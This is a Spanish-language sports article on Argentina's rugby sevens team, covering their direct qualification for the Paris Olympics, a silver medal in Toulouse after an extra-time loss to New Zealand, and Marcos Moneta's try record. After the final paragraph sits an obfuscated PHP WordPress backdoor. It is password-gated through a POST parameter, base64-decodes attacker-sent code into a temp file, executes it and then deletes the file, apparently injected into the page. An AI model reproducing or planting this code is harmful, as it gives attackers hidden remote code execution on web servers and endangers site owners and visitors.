Pumas 7s: un presente soñado

Crédito: UAR / Gaspafotos

(Especial por Hernán Barrios) – El seleccionado argentino de rugby para Seven, Los Pumas 7s, vive un presente soñado, el mejor momento de su historia.

Luego de la obtención de la medalla de bronce en Tokio 2020 (+1), en aquél triunfo con sabor a hazaña, en el cotejo definitorio ante Sudáfrica (finalizaron el encuentro con 5 hombres, luego de jugar gran parte del partido con 6), los dirigidos por Santiago Gómez Cora continúan en ascenso, transformándose en un equipo que parece no tener techo.

Este fin de semana, en la etapa del circuito Mundial que se desarrolla en Toulouse, Francia, lograron la clasificación directa a los Juegos Olímpicos de París, debido al segundo lugar en el ranking de la especialidad. No conformes con ese hito, impensado hace algunos años atrás, volvieron a acceder al encuentro definitorio, por quinta vez en la temporada, para finalmente caer ante Nueva Zelanda, por 24 a 19, en tiempo suplementario. Los All Blacks 7s, el mejor equipo de la temporada, es el otro equipo ya tiene el boleto asegurado, junto a Francia, el anfitrión. Fiji, bicampeón olímpico, quedó a 1 punto del objetivo, pese a su 9no lugar en Francia, en tanto Australia (125), Samoa (116) y Sudáfrica (116)  disputarán la restante en la última etapa del circuito 2022-2023, que se llevará a cabo en Londres, la semana próxima.

En Toulouse, el equipo dirigido por Gómez Cora se quedó con la medalla de plata, en un recorrido casi perfecto, ya que derrotó a Alemania, España y Gran Bretaña en la clasificación (con un triunfo aplastante ante los británicos, por 50 a 0, convirtiendo 8 tries y 5 conversiones, que además del primer lugar en la zona, les dio el pasaporte olímpico), a Sudáfrica por 21 a 19 en cuartos de final. En semis, golearon 33 a  5 a Canadá, y en la final, cayeron por 24 a 19 ante Nueva Zelanda, en un encuentro que se definió en tiempo extra.

A nivel individual, también han superado marcas históricas. Marcos Moneta, uno de los mejores de la modalidad 7s, batió el récord de tries que ostentaba el ahora entrenador Santiago Gómez Cora. Con su anotación en la final, alcanzó las 43 conquistas, dejando atrás los 38 del ex jugador de Lomas. Moneta, surgido en San Andrés, fue partícipe de otra de las conquistas en el juego reducido, integró el plantel que en 2018 obtuvo, también por primera vez, el oro en los Juegos Olímpicos de la Juventud, disputados en Buenos Aires.

Sin lugar a dudas, Gómez Cora ha transformado a un equipo, que solía disputarle algunos partidos a las potencias, e incluso logró coronarse en varias etapas, en uno de los ´cucos´ del  circuito, ya que esta temporada, se quedaron con el título en 3 ocasiones, en Hamilton (Nueva Zelanda) derrotando al anfitrión, en Vancouver (Canadá), al vencer a Francia, y en la que finalizó este Domingo en Toulouse (Francias), imponiéndose nuevamente ante los de Negro. Solo en la instancia disputada en Sídney, Australia. no superaron la clasificación, y tuvieron que conformarse con en el noveno puesto. Finalizada la presente temporada, será el momento de empezar a pensar en la cita olímpica, y por qué no soñar con superar la hazaña de Tokio. Este grupo de jugadores ya demostró que tiene sobrados argumentos para sostener esa ilusión.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}